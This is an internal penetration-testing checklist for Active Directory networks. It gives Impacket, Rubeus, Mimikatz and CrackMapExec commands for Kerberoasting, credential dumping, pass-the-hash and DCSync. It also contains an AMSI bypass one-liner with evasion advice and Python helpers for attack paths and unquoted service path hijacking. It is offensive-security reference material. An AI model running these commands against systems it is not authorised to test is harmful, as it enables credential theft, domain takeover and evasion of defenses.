Internal Penetration Testing Checklist

🔍 Initial Reconnaissance

Network Discovery

  • Identify network range (netdiscover, arp-scan)
  • Port scanning (nmap -sV -sC)
  • Identify domain controllers
  • Enumerate DNS records
  • LLMNR/NBT-NS poisoning (Responder)
  • ARP spoofing potential
  • Identify network segmentation

Service Enumeration

  • SMB share enumeration (smbclient, CrackMapExec)
  • SNMP enumeration
  • LDAP anonymous bind
  • RPC enumeration
  • Web services on internal hosts
  • Database servers (MSSQL, MySQL, Oracle)
  • Printers and IoT devices

👤 Active Directory Enumeration

Domain Information

  • Enumerate domain users (GetADUsers.py)
  • Enumerate domain groups
  • Enumerate domain computers
  • Identify domain admins
  • Check password policy
  • Enumerate GPOs
  • Check for LAPS deployment

BloodHound Collection

# SharpHound
.\SharpHound.exe -c All -d domain.local

# Python collector
bloodhound-python -d domain.local -u user -p pass -ns DC_IP -c all

AD Attack Paths

  • Identify shortest path to DA
  • Find kerberoastable accounts
  • Find AS-REP roastable users
  • Identify delegation issues
  • Find users with DCSync rights
  • Check for GPP passwords
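"Shortest path to DA" is a graph search over the edges SharpHound collects (MemberOf, AdminTo, HasSession, GenericAll, ForceChangePassword, ...). The following added example, which is not part of the original checklist or of BloodHound itself, runs that search as a plain breadth-first search over a small constructed edge list so the mechanics are visible without a Neo4j instance. All principal names and edges are made up for illustration.

```python
"""Shortest attack path to Domain Admins over BloodHound-style edges (added example)."""
from collections import deque

# Constructed sample graph, not collector output: (source, edge type, target),
# using BloodHound's edge names and its upper-cased principal format.
SAMPLE_EDGES = [
    ("J.DOE@DOMAIN.LOCAL", "MemberOf", "HELPDESK@DOMAIN.LOCAL"),
    ("HELPDESK@DOMAIN.LOCAL", "AdminTo", "WS01.DOMAIN.LOCAL"),
    ("HELPDESK@DOMAIN.LOCAL", "AdminTo", "WS02.DOMAIN.LOCAL"),
    ("HELPDESK@DOMAIN.LOCAL", "ForceChangePassword", "SVC_BACKUP@DOMAIN.LOCAL"),
    ("WS01.DOMAIN.LOCAL", "HasSession", "SVC_BACKUP@DOMAIN.LOCAL"),
    ("WS02.DOMAIN.LOCAL", "HasSession", "J.DOE@DOMAIN.LOCAL"),   # cycle back to the start node
    ("SVC_BACKUP@DOMAIN.LOCAL", "GenericAll", "IT-ADMINS@DOMAIN.LOCAL"),
    ("IT-ADMINS@DOMAIN.LOCAL", "MemberOf", "DOMAIN ADMINS@DOMAIN.LOCAL"),
]

DA = "DOMAIN ADMINS@DOMAIN.LOCAL"


def shortest_path(edges, start, target):
    """BFS over directed edges; returns [(src, edge, dst), ...] or None if unreachable.
    Each hop is one abuse primitive, so the fewest-hop path is the cheapest to test first."""
    adj = {}
    for src, rel, dst in edges:
        adj.setdefault(src, []).append((rel, dst))
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            break
        for rel, nxt in adj.get(node, []):
            if nxt not in prev:       # first discovery is shortest in BFS; also breaks cycles
                prev[nxt] = (node, rel)
                queue.append(nxt)
    if target not in prev:
        return None
    hops, cur = [], target
    while prev[cur] is not None:
        src, rel = prev[cur]
        hops.append((src, rel, cur))
        cur = src
    return hops[::-1]


def render(path):
    """One-line rendering in the style of a BloodHound path result."""
    if not path:
        return "no path"
    return path[0][0] + "".join(f" -[{rel}]-> {dst}" for _, rel, dst in path)


if __name__ == "__main__":
    print(render(shortest_path(SAMPLE_EDGES, "J.DOE@DOMAIN.LOCAL", DA)))
```

On this graph the search prefers the four-hop route through ForceChangePassword over the five-hop route through the WS01 session, which is the same ranking BloodHound's "Shortest Paths to Domain Admins" query produces. Remember that a HasSession edge is only usable once you are local admin on that host, so verify each hop's prerequisite before relying on the path.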

🎫 Kerberos Attacks

Kerberoasting

# Impacket
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request

# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

  • Request TGS for service accounts
  • Crack service account hashes
  • Identify high-value service accounts

AS-REP Roasting

# Impacket
GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP

  • Identify users with "Do not require Kerberos preauthentication" set
  • Request AS-REP tickets for them
  • Crack obtained hashes

Pass-the-Ticket

  • Extract tickets from memory (Mimikatz)
  • Inject tickets for lateral movement
  • Golden ticket attack
  • Silver ticket attack

🔑 Credential Harvesting

Memory Extraction

# Mimikatz
sekurlsa::logonpasswords
sekurlsa::tickets /export
lsadump::sam
lsadump::dcsync /domain:domain.local /user:Administrator

Credential Locations

  • LSASS memory dump
  • SAM/SYSTEM/SECURITY hives
  • NTDS.dit extraction
  • Cached credentials
  • Browser saved passwords
  • KeePass databases
  • Configuration files

Hash Cracking

# Hashcat
hashcat -m 1000 hashes.txt wordlist.txt  # NTLM
hashcat -m 13100 hashes.txt wordlist.txt # Kerberoast
hashcat -m 18200 hashes.txt wordlist.txt # AS-REP

↔️ Lateral Movement

Techniques

  • Pass-the-Hash (PTH)
  • Pass-the-Ticket (PTT)
  • Overpass-the-Hash
  • PSExec / SMBExec
  • WMI execution
  • WinRM / PowerShell Remoting
  • RDP hijacking
  • DCOM execution

CrackMapExec

# Spray a credential across targets; "Pwn3d!" in the output marks local admin
# (drop --local-auth when the account is a domain account rather than a local one)
cme smb targets.txt -u user -p pass --local-auth

# Execute commands with an NT hash (pass-the-hash)
cme smb target -u admin -H hash -x "whoami"

# Dump SAM
cme smb target -u admin -H hash --sam

⬆️ Privilege Escalation

Windows PrivEsc

  • Unquoted service paths
  • Weak service permissions
  • AlwaysInstallElevated
  • Scheduled tasks
  • Autologon credentials
  • Token impersonation (Potato attacks)
  • UAC bypass
  • DLL hijacking
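Unquoted service paths are exploitable because, for an unquoted `ImagePath` containing spaces, the service control manager tries `<prefix>.exe` at every space before the real binary; the bug only pays off when one of those prefix directories is writable by the low-privileged user and the service can be restarted (or the host rebooted). The following added example, which is not part of the original checklist or of WinPEAS/PowerUp, computes those candidate paths for a given `ImagePath` and filters them against a caller-supplied list of writable directories. Feed it the paths from `wmic service get name,pathname` or `Get-CimInstance Win32_Service` and the directories that `icacls` reports as writable; the `ImagePath` values and writable directories used here are constructed for illustration.

```python
"""Candidate hijack paths for an unquoted service ImagePath (added example)."""
import re


def unquoted_service_candidates(image_path: str):
    """Return the paths the service control manager would try, in order, before the real
    binary. [] means the bug does not apply (quoted path, or a binary path without spaces)."""
    path = image_path.strip()
    if path.startswith('"'):
        return []                         # quoted: the exact path is resolved, no ambiguity
    # The binary is everything up to the first token ending in .exe; the rest are arguments.
    m = re.match(r"(.*?\.exe)(?=\s|$)", path, re.IGNORECASE)
    if not m:
        return []
    exe = m.group(1)
    # For every space in the binary path, CreateProcess first tries <prefix>.exe
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def _norm(directory: str) -> str:
    """Case-fold and strip the trailing backslash, keeping drive roots such as C:\\ intact."""
    d = directory.strip().lower()
    return d if len(d) <= 3 else d.rstrip("\\")


def exploitable(image_path: str, writable_dirs):
    """Keep only candidates whose parent directory the current user can write to.
    writable_dirs comes from the caller (e.g. parsed icacls / Get-Acl output), not from this code."""
    writable = {_norm(d) for d in writable_dirs}
    return [c for c in unquoted_service_candidates(image_path)
            if _norm(c.rsplit("\\", 1)[0] + "\\") in writable]


# Constructed sample ImagePath values (no real product is implied)
SAMPLE_SERVICES = {
    "AcmeAgent": "C:\\Acme Software\\Agent Service\\agent.exe -run",
    "AcmeAgentQuoted": "\"C:\\Acme Software\\Agent Service\\agent.exe\" -run",
    "Schedule": "C:\\Windows\\System32\\svchost.exe -k netsvcs",
}
SAMPLE_WRITABLE = ["C:\\Acme Software\\", "C:\\Users\\Public"]

if __name__ == "__main__":
    for name, image in SAMPLE_SERVICES.items():
        print(name, unquoted_service_candidates(image), exploitable(image, SAMPLE_WRITABLE))
```

A finding is only reportable when `exploitable` returns a non-empty list and you have confirmed the service runs as SYSTEM (or another higher-privileged account) and can be restarted by your user or starts automatically at boot; a writable candidate directory on a service you cannot restart is a weakness, not a privilege escalation.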

Tools

# WinPEAS
.\winPEASx64.exe

# PowerUp (dot-source the script, then run the checks)
. .\PowerUp.ps1; Invoke-AllChecks

# Seatbelt
.\Seatbelt.exe -group=all

🏰 Domain Dominance

DCSync Attack

# Mimikatz
lsadump::dcsync /domain:domain.local /all /csv

# Impacket
secretsdump.py domain/admin:password@DC_IP

Persistence

  • Golden Ticket
  • Silver Ticket
  • Skeleton Key
  • AdminSDHolder abuse
  • DCSync backdoor
  • Group Policy modification

🛡️ Defense Evasion

Techniques

  • Disable Windows Defender
  • AMSI bypass
  • ETW bypass
  • Process injection
  • Living off the land (LOLBins)
  • Fileless malware techniques

AMSI Bypass Examples

# Classic amsiInitFailed bypass, shown in the clear; Defender signatures this exact string,
# so in practice it must be obfuscated or the memory patched by other means
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

📊 Severity Matrix

Finding                              Severity   Impact
Domain Admin compromise              Critical   Full domain control
Kerberoastable account in Domain Admins  Critical   Potential DA access via offline cracking
DCSync rights on a non-DC principal  Critical   All domain hashes
Local admin on multiple hosts        High       Lateral movement
Weak password policy                 High       Credential compromise
LLMNR/NBT-NS enabled                 Medium     Credential capture
SMB signing disabled                 Medium     Relay attacks

🛠️ Essential Tools

Tool            Purpose
BloodHound      AD attack path analysis
CrackMapExec    Network pentesting
Impacket        Network protocols
Mimikatz        Credential extraction
Rubeus          Kerberos attacks
PowerView       AD enumeration
Responder       Credential capture

Last updated: 2024